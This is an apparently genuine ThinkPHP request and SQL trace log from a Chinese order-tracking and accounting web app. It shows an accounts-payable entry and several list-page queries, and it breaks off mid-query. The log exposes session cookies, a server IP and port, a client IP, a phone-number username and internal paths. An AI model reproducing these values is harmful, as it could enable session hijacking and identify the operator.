mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000834s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000458s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000654s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001357s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000862s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000400s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.000808s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountspayable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000409s ] [ sql ] [ SQL ] INSERT INTO `ot_accountspayable` (`subject_type` , `suppliercustomer_id` , `worker_id` , `explain` , `paid_money` , `factorymge_id` , `year` , `month` , `day` , `createtime` , `updatetime` , `yu_money`) VALUES (4 , 65 , 0 , '氧化费' , 9744 , 40 , 2025 , 12 , 14 , 1765701328 , 1765701328 , 574682.715) [ RunTime:0.004813s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_ladger` [ RunTime:0.000770s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000374s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`payable_money` , `payable_id` , `subject_type` , `explain` , `factorymge_id` , `createtime` , `updatetime` , `year` , `month` , `day` , `yu_money`) VALUES (9744 , 7349 , 4 , '氧化费' , 40 , 1765701328 , 1765701328 , 2025 , 12 , 14 , 927599.89891708) [ RunTime:0.005456s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000778s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 应付账款 添加贷方' , '{\"dialog\":\"1\",\"row\":{\"subject_type\":\"4\",\"suppliercustomer_id\":\"65\",\"worker_id\":\"\",\"explain\":\"\\u6c27\\u5316\\u8d39\",\"paid_money\":\"9744\"}}' , '/admin/financial/accountspayable/addyifu?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765701328) [ RunTime:0.004603s ] --------------------------------------------------------------- [ 2025-12-14T16:35:28+08:00 ] 106.112.204.117 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265749 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265749 [运行时间:0.083321s][吞吐率:12.00req/s] [内存消耗:5,713.65kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001243s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1765701265749', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001535s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000172s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000490s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000766s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000559s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000707s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001005s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000799s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000329s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.000818s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000861s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000971s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.013816s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.001052s ] --------------------------------------------------------------- [ 2025-12-14T16:35:31+08:00 ] 106.112.204.117 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265750 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265750 [运行时间:0.078538s][吞吐率:12.73req/s] [内存消耗:5,713.65kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001278s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1765701265750', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001548s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000202s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000518s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000725s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000438s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000691s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001162s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000957s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000341s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.000759s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000612s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000792s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.014692s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.000803s ] --------------------------------------------------------------- [ 2025-12-14T16:35:41+08:00 ] 106.112.204.117 GET /admin/productmge/productinfo?addtabs=1 [ info ] 47.105.33.115:8081/admin/productmge/productinfo?addtabs=1 [运行时间:0.048777s][吞吐率:20.50req/s] [内存消耗:5,233.91kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001161s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'productmge.productinfo', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/productmge/productinfo?ref=addtabs', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=sh24u5m97mn22og8ehb2h8q7c5', ) [ info ] [ PARAM ] array ( 'addtabs' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001487s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/productmge/productinfo.php [ info ] [ RUN ] app\admin\controller\productmge\Productinfo->index[ /alidata/www/gendan/application/admin/controller/productmge/Productinfo.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/productmge/productinfo/index.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'productStatusList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000105s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000545s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000834s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000400s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000874s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001034s ] [ sql ] [ SQL ] SELECT `title`,`remark` FROM `ot_auth_rule` WHERE `name` = 'productmge/productinfo' LIMIT 1 [ RunTime:0.000408s ] --------------------------------------------------------------- [ 2025-12-14T16:35:42+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=productmge.productinfo&v=1765701341 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=productmge.productinfo&v=1765701341 [运行时间:0.030544s][吞吐率:32.74req/s] [内存消耗:3,852.88kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001194s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/productmge/productinfo?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=sh24u5m97mn22og8ehb2h8q7c5', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'productmge.productinfo', 'v' => '1765701341', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001470s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/productmge/productinfo.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:35:42+08:00 ] 106.112.204.117 GET /admin/productmge/productinfo/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1765701342644 [ info ] 47.105.33.115:8081/admin/productmge/productinfo/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%7D&op=%7B%7D&_=1765701342644 [运行时间:0.062531s][吞吐率:15.99req/s] [内存消耗:5,466.37kb] [文件加载:84] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001289s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'productmge.productinfo', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/productmge/productinfo?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=sh24u5m97mn22og8ehb2h8q7c5', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{}', 'op' => '{}', '_' => '1765701342644', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001573s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/productmge/productinfo.php [ info ] [ RUN ] app\admin\controller\productmge\Productinfo->index[ /alidata/www/gendan/application/admin/controller/productmge/Productinfo.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000112s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000519s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000828s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000478s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001035s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001182s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001210s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000789s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_productinfo` `productinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `productinfo`.`factorymge_id`=`factorymge`.`id` WHERE `productinfo`.`factorymge_id` = '40' AND `product_status` = '1' ORDER BY `productinfo`.`id` DESC LIMIT 1 [ RunTime:0.001568s ] [ sql ] [ SQL ] SELECT `productinfo`.`id`,`productinfo`.`product_avatar`,`productinfo`.`name`,`productinfo`.`product_num`,`productinfo`.`kucun`,`productinfo`.`takeup_kucun`,`productinfo`.`staff_ids`,`productinfo`.`staff_names`,`productinfo`.`pid`,`productinfo`.`corresponding_num`,`productinfo`.`position`,`productinfo`.`price`,`productinfo`.`factorymge_id`,`productinfo`.`product_status`,`productinfo`.`admin_id`,`productinfo`.`createtime`,`productinfo`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_productinfo` `productinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `productinfo`.`factorymge_id`=`factorymge`.`id` WHERE `productinfo`.`factorymge_id` = '40' AND `product_status` = '1' ORDER BY `productinfo`.`id` DESC LIMIT 0,10 [ RunTime:0.000582s ] [ sql ] [ SQL ] SELECT `productinfo`.`id`,`productinfo`.`product_avatar`,`productinfo`.`name`,`productinfo`.`product_num`,`productinfo`.`kucun`,`productinfo`.`takeup_kucun`,`productinfo`.`staff_ids`,`productinfo`.`staff_names`,`productinfo`.`pid`,`productinfo`.`corresponding_num`,`productinfo`.`position`,`productinfo`.`price`,`productinfo`.`factorymge_id`,`productinfo`.`product_status`,`productinfo`.`admin_id`,`productinfo`.`createtime`,`productinfo`.`updatetime`,factorymge.id 